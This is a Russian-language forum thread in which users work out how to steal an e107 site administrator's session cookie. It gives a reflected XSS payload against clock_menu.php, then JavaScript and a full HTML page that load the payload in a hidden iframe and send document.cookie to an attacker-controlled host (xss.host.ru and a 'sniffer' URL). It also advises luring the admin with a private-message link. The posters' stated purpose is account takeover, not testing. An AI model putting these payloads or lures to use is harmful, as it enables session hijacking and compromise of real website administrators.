Тако сабж... Есть уязвимость в движке е107 Code: clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Собсна проблема в том, что не знаю как сделать так чтобы, это все подсунуть админу, и чтобы его куки выскочили не в окне, а сохранились где-то на моем хосте в лог файлах...в этом роде... З.Ы если есть другие варианты подскажите пожалуйста... а то уже 2-ую неделю мучаюсь Заранее спасибо
Эм....тут чуток разобрался...запустил снифер....Но снифер только на форум..на сайт никак...везде права на все урезаны...как мне через активную xSS можно сделать...Люди, помогите пожалуйста.
сделай страничку на каком нибудь фрихосте, на странице сделай нивидимый фрейм на хсс, админу в личку отправь месачь с сылкой на эту страницу
А используя Code: document.write('<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="'+'http://xss.host.ru/xss.php'+'?['+location.host+']:'+document.cookie+'"></iframe>'); используя ява скрипт он должен открывать в принципе фрейм и сохранять куки вот здесь http://xss.host.ru/cookies Но после всех проделанных действий ни куки ничего... З.Ы. хост поддерживает и выполнение ява скриптов и пхп
у кукисов наверно ограниченная зона действия. по дефолту у всех / стоит, но можно выбрать и другую диру
попробуй так HTML: <html> тут какой нибуть флуд для админа <iframe width=21 height=11 style="position: absolute; visibility: hidden;" src="http://жертва/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--><script>document.location='http://тутснифер/?'+document.cookie+;</script>"></iframe> </html>
